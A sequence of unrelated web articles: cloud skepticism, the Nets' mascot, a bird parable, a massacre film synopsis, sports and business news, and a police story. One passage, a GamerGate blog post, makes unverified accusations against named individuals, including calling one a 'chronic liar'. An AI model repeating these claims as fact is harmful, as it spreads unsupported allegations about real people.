I have never been all-in with the cloud. I want my processing power to be local, preferably right in front of me. People were trying to get away from central control for decades when the first personal computers appeared in 1975. These were wimp machines by today's standards and off-board storage was a cassette deck. Now we have incredible processing power and you can get a high-speed 4 Terabyte hard disk for $180 at Costco. Yet people are returning to the big mamma in the sky, accepting a client-server relationship that was a consistent flop decade ago. That is, until the Internet began to dumb down the majority of users.
With Linux never catching on and the rise of the cloud-centric operating systems alongside the weak phone/tablet OS taking over, everyone is back where they started: pre-1975. Centralized control wins out. I guess that is what the public wanted all along and the "personal" computer movement was actually a fad. Who knew?
When the Nets moved from New Jersey to their shiny rusty new home in Brooklyn in the fall of 2012, they took it as an opportunity to reform the image of the franchise. They set out to be the hip alternative to the presumably stodgy, tradition-oriented New York Knicks in Manhattan. They would have black uniforms. They would play on a herringbone-patterned court. They would make many bold, financially inadvisable moves to capture a decent playoff seed. These would not be your grandma's Nets.
So, to aid in constructing this new era, they hired Marvel to make them a new mascot. The result was the BrooklyKnight, a crime-fighting humanoid with a metal mask with a smiling face on it, which made him look like a troubled Renaissance Faire attendee asked to leave the grounds after 20 minutes. Negative reaction was swift — adults and children didn't like this creation very much, and he only really lost notoriety when the rebranded New Orleans Pelicans introduced the first incarnation of their toxic-avenger bird Pierre this past fall.
The Nets apparently had not forgotten how much the public disliked BrooklyKnight — maybe because it feels absolutely ridiculous to type that name once, let alone throughout an entire article — and have responded in kind. On Wednesday night, Grantland's Zach Lowe tweeted that the Nets were putting the BrooklyKnight character on hiatus. On Thursday, the team confirmed that the mascot will not return:
Scroll to continue with content Ad
Official Nets statement: "We put a lot of effort into the BrooklynKnight, but we've decided to go in a different direction." #RIPKNIGHT — Zach Lowe (@ZachLowe_NBA) July 10, 2014
Story continues
Unless the BrooklyKnight was somehow maimed in an underground urban jousting competition, it appears that the Nets have just decided that two years was too long to have this mascot out scaring children. As noted by Lowe in his BrooklyKnight obituary, it takes a special creation to be deemed too terrifying for an NBA mascot — this is a league, after all, where a coyote who rarely wears pants can lose his perpetually zonked-out green eyeballs and still remain beloved by hometown fans. Yet the BrooklyKnight was too much — the combination of that smile, a special black van, and the bondage undertones of the whole thing proved unsustainable. Frankly, it's a little surprising that the guy made it two seasons.
We don't know if and when the Nets will go with another mascot, but the BrooklyKnight will not receive Pierre-inspired "surgery" and return in a friendlier guise. (I'm also pretty sure BrooklyKnight is the NBA's unlicensed surgeon.) We will only have precious memories like this one:
It's not goodbye, it's see you later. Because you will haunt our dreams forever.
- - - - - - -
Eric Freeman is a writer for Ball Don't Lie on Yahoo Sports. Have a tip? Email him at efreeman_ysports@yahoo.com or follow him on Twitter!
A man, hunting in the woods, captured a bird, which immediately began to talk. The man was thrilled, dreaming out loud of the money he could make.
The bird spoke up. “Hey, that's a great plan, but what happens if I croak? You don't know how long my natural lifespan is, and neither do I. If you promise to let me go free, I'll give you 3 pieces of advice that can help you be successful as long as you live!”
The man thought about it. This bird must be really wise, if he could talk that way. So he agreed and let the bird go. The bird flew up onto a branch and said, “Okay, here you go. Number one: Never regret your decisions. Number two: Never believe something that's obviously impossible. Number three: Know your limits and don't over-reach. Bye!” The bird flew up to a higher branch, looked down at the man and said “Whoops, I forgot to tell you something. I've got 37 pounds of diamonds in my belly. S'long, sucker!”
The man became enraged and thought he must be really stupid for letting such a valuable bird go. “Even if you die, those diamonds could make me rich!” he said, and began shooting at the bird. But the bird dodged the pellets and flew from branch to branch, taunting the man (in flawless English, naturally).
The man ran out of birdshot, but refused to give up. He began climbing the tree in hopes of reaching the bird where he was perched. The bird let the man get almost within grabbing distance, and then flew up to a higher branch. This went on for a long time. Finally, the bird was at the top of the tree, but the man was still scrambling from limb to limb, determined to capture the bird. He again got almost within grabbing distance of the bird. The bird was stretching his wings, getting ready to fly somewhere else, when the limb broke. The man fell 50 feet to the ground, breaking a leg, an arm, and his nose.
The bird flew down to the ground and sat near the man, just out of arm's reach. He said, quietly, “You know, you really are a dummy. Don't you remember what I told you when you let me go? Letting me go was the smartest thing you ever did…but then you blew it. Remember the three pieces of advice?
“Number one: Never regret your decisions . As soon as you let me go, you regretted it, and look where that got you. You just wasted your whole afternoon and now you'll be limping around for months.
“Number two: Never believe something that's obviously impossible . Look at me….you held me in your hand. Now, how could you believe I had 37 pounds of diamonds in my belly?
“Number three: Know your limits and don't over-reach. You over-reached, and fell out of that tree. What did you think you were, a squirrel? You're just a human. A very stupid one. Bye!” He gave the hunter an exquisitely gentle "peck" on the hand (the one attached to the broken arm, to prevent grabbing), and flew off, never to be seen again.
By Vol-E, originally told by UU Minister J.B.:
On December 6, 1989, a lone gunman walked into Montréal's École Polytechnique, a post-secondary institution focusing primarily in engineering, and began a shooting massacre. This event and its aftermath are shown from the perspective of three people. The first is the shooter himself, who blamed the problems in his life on who he considered feminists, such as female engineering students, who were his primary targets. This event was the culmination of a seven year plan, which had a self-defined end. The second is female mechanical engineering student Valérie, who earlier that day had an interview for her dream internship, working on an aerospace project. The interview process itself was a disturbing one for her in the stereotypical view by the male interviewer, who did not believe that females could work in the business and still have aspirations to have a family. And the third is Jean-François, Valérie's friend and fellow mechanical engineering student, who was one of the few who did ... Written by Huggo
Reiterating that MLS has told Sacramento that expansion to California's capital is “not a matter of if, but when,” mayor Kevin Johnson said Tuesday that the city is forging ahead with its plans for a downtown, soccer-specific stadium even though Minneapolis and Miami appear set to secure the league's next two slots.
Dubbing the initiative “Operation Turnkey,” Johnson said the city and Sacramento Republic will be working “To do all the things necessary to ensure our stadium is ready to go,” and that, “The moment MLS says Sacramento is ready to come online, we'll have shovels in hand and be ready to dig.”
The news conference was prompted by Monday's confirmation from MLS that Minnesota United is in line to become the league's 23rd team (an announcement should come within a month) and that it now is prepared “to evaluate potential expansion beyond 24 clubs.”
When commissioner Don Garber announced in the summer of 2013 that MLS planned to field 24 teams in 2020, no one could have imagined the turn of events in Sacramento, where Republic took the field for the first time in the spring of 2014. Since then, it's won the United Soccer League championship, set minor league attendance records, sold 9,000 season tickets and built an investor group that includes the San Francisco 49ers and Sacramento Kings.
“Our market has demonstrated that we are a major league market,” Johnson said.
And its status as an MLS market would be more certain if not for the league's 2007 deal with former LA Galaxy midfielder David Beckham, who exercised a contract option allowing to buy an expansion team at a reduced rate ($25 million). Beckham confirmed his Miami intentions in February 2014 and has been pursuing a stadium site since then. Although there have been complications, namely the failure to win approval to build on two pieces of downtown, waterfront property, optimism persists.
It's understood that Beckham and his partners, Simon Fuller and Marcelo Claure, have options. For example, they likely could build on property adjacent to Marlins Park in the Little Havana neighborhood west of downtown. The site's proximity to a baseball stadium that left a bad taste in the mouth of many Miamians and its distance from public transport and the downtown core has left Beckham continuing to search for more attractive possibilities elsewhere.
But its availability likely means that, if dealing with a deadline, Beckham has at least one fallback option that ensures his MLS spot.
There are no guarantees, however—not in Miami or Minneapolis or Los Angeles. So Sacramento has determined that if one of those markets falters, it will be ready. And if the MLS board of governors decides to commit to a 25th club, it will be ready.
“We all know that those things can easily happen in this line of work and we want to be in a position to step in. But that's not our expectation,” Johnson said.
“Our expectation is that [other expansion markets] complete what they set out to do and that Operation Turnkey puts us in position that if we do get selected in the not-too-distant future, we're ready to hit the ground running."
A lot goes into building a stadium, and Turnkey—details of which will be hashed out and unveiled in the coming weeks—is designed to get the city and Republic moving down their checklist. Control over the site at the Sacramento Railyards must be finalized (there's currently a Letter of Intent between the club and developer) and the land must be purchased. It helps that the site's lead developer, Larry Kelley, is a Republic investor. There are financial and feasibility studies to do and an environmental impact report to prepare. Preliminary design work needs to be started and a term sheet must be negotiated between the club, developer and the city.
Republic has sufficient confidence in its expansion bid that its ready to take those steps. It's an atypical commitment from an atypical club.
Speaking to SI.com following the news conference, Republic lead investor Kevin Nagle said all parties involved—club ownership, the city and stadium stakeholders—were prepared to see their expansion effort through. Stadium financing is in place. Progress in Minneapolis and Miami may force Sacramento to wait longer than it would like, but it is able and willing to do so.
“I know all of the investors really well. They're people I work with. They're great guys. Many of them are my partners over at the Kings. They're super supportive,” he said.
“I don't see any issue right now,” with keeping the bid together if MLS decides to wait, Nagle said. “I just don't.”
The league is ready to look into expansion beyond 24 teams. There's no reason a decision couldn't be made soon, and no reason a new team or teams couldn't enter before 2020. There's little question at the moment that Sacramento leads that race.
Nigerian regulators have told parliament that Royal Dutch Shell, the Netherlands-based oil and gas company, should be fined $5bn for environmental damage caused by an oil spill at its offshore Bonga field last December.
Shell said on Tuesday there was no legal basis for the proposed fine.
The country's National Oil Spill Detection and Response Agency (NOSDRA) told a parliamentary committee on Monday that although last year's spill, estimated at about 40,000 barrels, was contained offshore, there was a serious environmental threat.
NOSDRA said that the leakage was caused by a failure in Shell's oil export hose.
"The spilled barrels impacted approximately 950 square kilometres of water surface, affected a great number of sensitive environmental resources," NOSDRA said before the environment committee of the national assembly.
"It has a direct social impact on the livelihood of people in the riverine areas whose primary occupation is fishing."
Shell said that last December's spill happened while a tanker was loading oil, leading to the complete shutdown of the company's Bonga facility. Production restarted in January.
"We do not believe there is any basis in law for such a fine. Neither do we believe that SNEPCo [Shell Nigeria Exploration and Production Co] has committed any infraction of Nigerian law to warrant such a fine," Shell said on Tuesday.
"SNEPCo responded to this incident with professionalism and acted with the consent of the necessary authorities at all times to prevent environmental impact as a result of the incident."
Bonga accounts for around 10 per cent of monthly oil flows from Nigeria, the continent's largest exporter of crude oil.
Oil spills are common in the mangrove creeks onshore Nigeria. Many are caused by sabotage strikes or oil thieves tapping into easily accessible pipelines. Several communities have taken Shell to court over a failure to clean up spills.
A United National Environment Programme report last year said that Shell was not doing enough to clean up spills and maintenance of infrastructure was inadequate.
Earlier this evening, I witnessed a Twitter user by the name of @FortesSnC get blocked on Twitter by the community manager for the highly anticipated crowdfunded game, Mighty No. 9. This manager happens to have deep ties to the controversial indie developer Zoe Quinn, and hasn't been shy about sharing them in her public role.
The user in question was given no reason for the block, although it appears to be tied to his support of the GamerGate movement. He did not harass either the community manager, or Ms. Quinn. I've also heard reports of other users being blocked for the same reason, but I haven't been able to confirm those in time for publication (reports since appear to be confirmed).
@MightyNo9… wait, what? I'm blocked from following a project I pledged $300 to because I support #Gamergate? Gneiss pic.twitter.com/ABVcjs3ymc — Forte ∅ (@FortesSnC) September 21, 2014
Here are some screenshots that were provided to me by a source earlier this evening. They show that Quinn and the community manager in question, who goes by the name of @PetiteMistress on Twitter, have had a long and enduring relationship (imgur album).
Just as i was about to publish this story, I came across another tweet from user @FortesSnC, which appears to confirm our suspicions: other paying customers are being blocked from Mighty No. 9 community outlets simply for professing support for the GamerGate movement. Sadly, as we've discussed previously here on TheRalphRetort.com, this is an all too common tactic for our opponents. Hopefully, continuing to call out the censorship and disrespect of consumers will spur the industry into real, meaningful, reform.
Newsflash: It is not just me. This backer tried to start #GamerGate threads on the @MightyNo9 forums as well. pic.twitter.com/tGNUuw70Kd — Forte ∅ (@FortesSnC) September 21, 2014
SHARE AREA:
UPDATE: More evidence of inappropriate behavior…
community manager for Mighty Number9 (who is a proven chronic liar) How shes still employed have no idea #GamerGate pic.twitter.com/AsQ5GxrOVx — Jonathan Randall (@xNYxKnux) September 21, 2014
[van id=”van/ns-acc/2015/07/09/MW-018TH_CNNA-ST1-1000000002cb5de9″]
A Kansas police officer used his own money to help out a widowed mother of six who was caught stealing on Monday at a Wal-Mart in Roeland Park, according to a report.
When Officer Mark Engravalle of the Roeland Park Police Department was called to the store to investigate the shoplifting report, he found a tearful Sarah Robinson and her six children in the parking lot, Kansas City-based television station KSHB reported.
He immediately noticed that three of her children weren't wearing shoes, and that their feet were covered in dirt.
The $300 in stolen goods from the store included not just children's shoes, but also diapers and baby wipes, according to the station.
Robinson explained to the officer that she was homeless, and that she and her kids had been living in her car since her husband accidentally drowned several years ago, the station reported. On occasion, the family was able to rent and share a bedroom in a stranger's Kansas City home.
“Being a father myself, it obviously pulled at my heart,” Engravalle told the KSHB.
The officer added he knew at that point he needed to do something to help the family out. He then ducked back inside the Wal-Mart and reached into his own pocket to buy diapers, wipes and a pair of shoes for each of Robinson's children.
“Obviously she is going through a tough time. Wal-Mart might see her as a criminal, but I just saw her as a mom going through a really difficult time,” Engravalle said.
Robinson said she was embarrassed by her actions, but told the station she'd run out of people to ask for help. She also feared she would lose her daughters.
“Every morning I get up and keep breathing for them. I could take the easy way out and send them to live with my mom, but I'm not going to do that. They're the reason I live,” she said.
Engravalle gave Robinson a ticket for breaking the law, but ultimately decided not to arrest her.
“What she did was wrong, but I think her heart was in the right place wanting to take care of her children,” he said.
For her part, Robinson was thankful that the officer did not arrest her and take away her children. She added she was also grateful for his generosity in paying for the much-needed items.
“He did something that will never be forgotten. He helped us when nobody else will,” she told the station.
CNN contributed to this story.
It's a big dream: The United States has won only a handful of fencing medals in Olympic history, none of them gold.
But Alexander Massialas is currently the world's top-ranked men's fencer in foil, one of the three swords used in the sport. His teammate Gerek Meinhardt, another San Francisco native trained by Greg Massialas, is ranked No. 3. Their Olympic teammates, both from New York, are also ranked in the top 10.
“We'll go into the Olympics as one of the top-ranked teams,” Alexander Massialas said. “If we don't win gold, it will be kind of a disappointment.”
‘Wild West of fencing'
Massialas — deemed the most “Cali” of all the U.S. fencers — is the product of a dream his father turned into reality in an unlikely place.
“When I came out here, it was the Wild West of fencing,” Greg Massialas said. “But I had a vision.”
The elder Massialas was born in Greece, but grew up in Ann Arbor, Mich. He started fencing as a boy through a recreation program. He went on to fence at Cornell University, won Ivy League championships, and became part of the national Olympic program. The national coach at the time, Michael D'Asaro, was coaching in San Jose. After college, Massialas came out to train with him, attracted primarily by the weather.
Massialas was at his peak as a fencer in 1980, the year the United States boycotted the Summer Olympics. He made the 1984 and 1988 teams, though, and later became an international referee. But life beyond the sport moved on: He got married to a woman who grew up in Taiwan, had a couple of kids and built a successful career selling advertising.
When he was trying to get Alexander into preschool at the Chinese American International School, someone suggested he should start an after-school fencing program there. So he did. His son was far too young to participate — Greg thought 7 was the right age to begin the sport — but the boy spent his afternoons watching the other kids fence, longing to do it himself.
“I was always pestering my dad to let me start earlier,” he said. “I loved it from the start.”
His program evolves
Massialas' coaching program grew, and in the late 1990s, with the support of his wife, he decided to take the leap, leave his job and focus on coaching fencing. He started the Massialas Foundation Fencing Club, first located on South Van Ness and later moved to the Sunset. He had a plan to create a fencing power that could compete with traditional powers like Italy, France and Russia (the top fencing countries have a history of swordsmanship, rather than guns).
Olympic fencers tend to be older, but Massialas knew that wouldn't work in the United States, where fencers wouldn't receive the kinds of government subsidies they do in other countries.
“My goal was for them to peak at 22,” he said. “And to coach a style that would make a 22-year-old successful. Fencing is a cerebral sport, but it's also very fast. Very athletic. Constant spurts of energy.”
Growing up, Alexander — now 22 — played soccer and basketball and swam. But fencing was always his priority. He went from the Chinese American school to the Drew School for high school. The summer after graduation, before enrolling at Stanford University, he became the youngest male athlete on the entire American 2012 Olympic team.
“London was surreal,” Massialas said. “It was electric.”
Plans on schedule
He finished 13th in London, while the U.S. team finished fourth, which, according to his dad's plans, was pretty much on schedule. Greg Massialas, who has been the Olympic coach in both Beijing and London, will serve in that capacity again in Rio.
At Stanford, Alexander Massialas studied mechanical engineering and won the NCAA championship twice. He took a leave of absence last spring to concentrate on the Olympics and compete at events in St. Petersburg, Shanghai and Paris. He still heads to the campus twice a week to work out with a trainer and also see his college friends, who will graduate this month.
His younger sister, Sabrina, 19, fences at the University of Notre Dame and is also on the national team, though women's foil is not part of the Rio competition, due to a rotation that takes one weapon out of competition each Olympics.
Walk in with Curry
Massialas is looking forward to his competition in Rio, but also the entire experience. Like so many Bay Area kids, he grew up a huge Warriors fan, and is hoping to walk in the Olympic opening ceremonies alongside Stephen Curry, Klay Thompson and Draymond Green, all likely to represent the U.S. in basketball.
And then, he'll compete.
“I'm in the best shape I've ever been in, I'm a lot more experienced, stronger and smarter,” Massialas said. “We have a very good team.”
And big dreams. Of bringing a couple of gold medals back to the Sunset.
Ann Killion is a San Francisco Chronicle columnist. Email: akillion@sfchronicle.com Twitter: annkillion
GLENDALE, Ariz. -- Chicago White Sox slugger Adam Dunn took his first live batting practice Tuesday, and the reaction of his manager was in stark contrast to that of his former one after Dunn's first cuts last spring.
Former manager Ozzie Guillen said he noticed a couple of days into spring training last year that Dunn's swing was going to be a problem, and it was.
Dunn, who had signed a four-year, $56 million contract before last season, became only the second non-pitcher in MLB history with at least 35 plate appearances to have a strikeout total (177) higher than his batting average (.159).
Guillen said he could see problems right away. New manager Robin Ventura, a former hitting coach, did not see any red flags.
"He looked fine to me," Ventura said Tuesday. "He was hitting live today. I saw him when he was hitting live. I didn't go over and look at batting practice, but he looked fine.
"I saw him hit yesterday BP. He looks great. Feeling good. That's all right now that I'm asking for. I was a hitting coach for a while, but I don't have the ability to just go out there and say, 'Not going to work.' "
Guillen said on "The Waddle & Silvy Show" on Feb. 10 that he could tell Dunn would be in for a rough season based on his first batting practice session. Guillen said he was approached by then-hitting coach Greg Walker, who told Guillen he needed to come see Dunn's session.
"He says, 'We have a problem,' " Guillen said. "I say, 'What? Spring training is only a couple of days (old).' He says, 'You've got to come out and see Adam Dunn's swing.' I said, 'Don't worry about it. We've got a month and a half to get ready, go through spring training. Don't worry about it.' "
Guillen said that after seeing Dunn's swing, he told bench coach Joey Cora that they had "a big problem" on their hands.
"It was painful to see Adam Dunn every at-bat and walk behind me (in the dugout) with a long face (after) striking out," Guillen said.
Guillen left for the Miami Marlins at the end of last season, and Walker is with the Atlanta Braves.
Dunn took batting practice this offseason for the first time in more than five years. He's not going to get caught up in his spring training numbers, though.
"It doesn't matter to me if I go out and hit .500 with 20 home runs in the spring," he said recently. "It probably won't translate over to the season."
Chris Silva is a special contributor to ESPNChicago.com.
